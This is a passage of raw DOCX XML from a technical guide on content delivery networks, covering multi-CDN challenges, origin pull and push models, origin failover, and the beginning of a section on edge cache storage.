    <w:p w14:paraId="0245F925" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  API: CDN C (best for API caching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173AAED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Challenges of Multi-CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D711F90" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D4C382" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Same content must be invalidated across ALL CDNs simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D3728" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Purge APIs differ between providers (different endpoints, different semantics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19C6B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1311"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Race condition: CDN A purged but CDN B still serves stale content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E8EB0A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration drift:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208DBDF2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Caching rules must be replicated identically across CDNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BCA22F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>A misconfiguration on one CDN → different behavior → debugging nightmare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6EAE5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analytics fragmentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E3CEA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Logs and metrics are split across providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3C23C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Must aggregate to get a complete picture of traffic/performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF60D9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Multi-CDN management platforms (Cedexis, Citrix ITM) handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503331A2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Unified configuration deployment to all CDNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703F4A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Unified purge propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDC4F2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Unified analytics aggregation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0951AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1314"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Intelligent routing based on real-time performance data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F4AEB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="32FCA0DB">
          <v:rect id="_x0000_i4693" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39D085" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. CDN and Origin Interaction Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B014C2C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 Pull Model (Origin Pull)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3F3E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D409613" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN is configured with origin URL (e.g., origin.example.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CA1060" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>On cache miss, CDN fetches content from origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2F290" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caches the response and serves to user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2080674A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1315"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Subsequent requests: served from cache (no origin contact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790747B6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27571C69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Simple setup (just point CDN at origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E9B565" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin only generates content when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0C7F2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1316"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No pre-population required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15636A1B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA4376" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>First request always hits origin (cold miss latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332ABB71" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin must be available when cache misses occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965B306" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 Push Model (Origin Push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D919FE9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B05FFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content creator uploads content directly to CDN storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F95DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN stores it at edges (or at a central storage, distributed on-demand).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59057CED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1318"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No "origin" in the traditional sense — CDN IS the storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42968609" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A0DD5D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No origin needed (CDN is the source of truth for static content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59074F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>No cache miss latency (content is pre-positioned).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A4954" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1319"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Perfect for large files (upload once, serve everywhere).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BD715" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775729FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Must actively manage content (upload, delete, organize).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F244A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Storage costs at CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A404C47" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Not suitable for dynamic content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB0D92" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Video platforms (upload video to CDN storage), software distribution (push binaries to CDN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36046259" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Origin Failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DAEAC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What happens when origin is down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1662DB1F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Without stale-if-error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CF78C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache miss → CDN tries origin → origin timeout/5xx → CDN returns 502/504 to user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31940A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cached content still served (for hits), but any miss = failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B095032" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With stale-if-error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F568514" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache miss → CDN tries origin → origin timeout/5xx → CDN serves stale cached content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C0DDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Users see slightly old content but no errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC703C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Only truly new content (never cached) fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A9A4A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Custom error pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E09B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN can serve a custom static error page when origin is completely unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316661A1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Pre-configured: "We're experiencing issues, please try again shortly."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC3C46" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Better than a bare "502 Bad Gateway" from the CDN proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33611AA7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple origins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F484E9D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Primary origin: origin-a.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC9DA1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Failover origin: origin-b.example.com (different region, different provider)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37CCA2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN tries primary. If unhealthy (health checks fail): automatically routes to failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B21D99" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="20B3CEB2">
          <v:rect id="_x0000_i4694" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2639A5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. CDN Cache Internals — Storage Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E3839" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 How Content Is Stored at the Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023FAEEA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The two-layer storage model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6025F011" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77AAB3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>┌─────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC5C6F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│      RAM Cache (Hot)         │   10–100 GB per server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD2EC22" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - Hash table (key → pointer)│   Access: &lt; 1 μs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9BE13" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>│  - LRU/LFU eviction          │   Hit ratio for hot content: 30–50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDC40F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
